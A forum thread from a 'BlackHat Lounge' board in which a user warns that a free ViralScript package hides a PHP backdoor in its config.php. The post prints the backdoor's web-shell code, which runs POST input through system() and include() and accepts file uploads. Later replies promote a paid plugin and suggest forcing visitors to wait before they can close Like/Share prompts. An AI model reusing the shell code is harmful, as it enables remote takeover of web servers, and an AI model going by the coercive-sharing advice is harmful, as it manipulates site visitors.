1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

ViralScript = backdoor to your site?

Discussion in 'BlackHat Lounge' started by kirkonpolttaja, Aug 15, 2010.

  1. kirkonpolttaja

    kirkonpolttaja Senior Member

    Joined:
    Feb 6, 2010
    Messages:
    1,027
    Likes Received:
    669
    Hey all!

    I was building my website and was doing some investigating... i ran to one interesting thing...

    There was this code (i dont post all of it):
    Code:
    echo "</textarea>"; 
    } 
    // ERORR // 
    if(empty($_POST[\'ER\'])){ 
    } else { 
    $ERORR=$_POST[\'ER\']; 
    echo  error_log(" 
    <html> 
    <head> 
    [B]<title> Exploit: error_log() By * TrYaG Team  * </title>[/B] 
    <body bgcolor="#000000"> 
    <table Width=\'100%\' height=\'10%\' bgcolor=\'#8C0404\' border=\'1\'> 
    <tr> 
    <td><center><font size=\'6\' color=\'#BBB516\'> [B]By  TrYaG Team[/B]</font></center></td> 
    </tr> 
    </table> 
    <font color=\'#FF0000\'> 
    </head> 
    <? 
    if($fileup == ""){ 
    ECHO " reade for up "; 
    }else{ 
    $path= exec("pwd"); 
    $path .= "/$fileup_name"; 
    $CopyFile = copy($fileup,"$path"); 
    if($CopyFile){ 
    echo " up ok "; 
    }else{ 
    echo " no up "; 
    } 
    } 
    if(empty($_POST[\'m\'])){ 
    } else { 
    $m=$_POST[\'m\']; 
    echo  system($m); 
    } 
    if(empty($_POST[\'cmd\'])){ 
    } else { 
    $h=  $_POST[\'cmd\']; 
     print include($h) ; 
    } 

    This is found inside ViralScript -> config.php file.

    If this is what i think it is (backdoor for the viralscript maker to my site) then can someone refer me a similiar script WITHOUT these goddamn exploits :)
     
  2. kirkonpolttaja

    kirkonpolttaja Senior Member

    Joined:
    Feb 6, 2010
    Messages:
    1,027
    Likes Received:
    669
    ok there is now much more revealed... This script (exploit) is made by Mohajer22 named TrYaG Team hacker

    Now as i read and skip the config.php file... it is FULL of TrYaG teams script and passthrou cr*p!

    No wonder that this script is shared for free, their team will gain full privilidges to your databases :)
     
  3. iceinthebox

    iceinthebox Newbie

    Joined:
    Jul 28, 2010
    Messages:
    48
    Likes Received:
    7
    You can find Facebook viral script for WordPress at ilikeviral and use /bhw after .com for BHW member discount ...
     
  4. kirkonpolttaja

    kirkonpolttaja Senior Member

    Joined:
    Feb 6, 2010
    Messages:
    1,027
    Likes Received:
    669
    iceinthebox, thanks for the tip, but will this be as good as viralscript? or even better? i'm having a freebie site that has this viralscript.

    If you can say yes or no then i might purchase that ilikeviral :)
     
  5. iceinthebox

    iceinthebox Newbie

    Joined:
    Jul 28, 2010
    Messages:
    48
    Likes Received:
    7
    Hi,

    Could not send you private message. the link is: http://ilikeviral.com/BHW/

    The main thing here is how you use the plugin and what kind of webpages and visitors you have.

    You can gently push the LIKE/SHARE request in selected pages, for example skip the front page and allow users to click their way out of it immediatly by pressing your close message which could say for example "If you don't want to recommend us, Press here", or you can use a more brute method by having a long closing time that visitors must wait to see something on your site if they prefer NOT to press the LIKE or Share button. You can also do something in between and have only a few seconds that user must wait if he does not want to press the LIKE or SHARE.

    There is no question that recommending something to friends by LIKE or SHARE is MUCH more accepted by visitors than forcing them to send individual emails to their friends so pressing this button should be easy and especially if you have interesting things to offer instead ! Let's say ebook or what ever else you might have that interests users. This could also be used to access certain articles ...
     
  6. kirkonpolttaja

    kirkonpolttaja Senior Member

    Joined:
    Feb 6, 2010
    Messages:
    1,027
    Likes Received:
    669
    Thanks for the link :) Just purchased and now going to make new site.. starting all over.

    What WP theme is best for squeeze page? or close to it.
     
  7. MaxPowers

    MaxPowers Regular Member

    Joined:
    Nov 30, 2009
    Messages:
    302
    Likes Received:
    193
    Theres lots of free wordpress landing pages.

    Just search "wordpress free landing pages". lol
     
  8. kirkonpolttaja

    kirkonpolttaja Senior Member

    Joined:
    Feb 6, 2010
    Messages:
    1,027
    Likes Received:
    669
    I would like to speacially know what is the best-of-the-best for BHW ;) FLEX theme was good if i remember correctly (dont remember the whole theme name.. flex sumthing :D )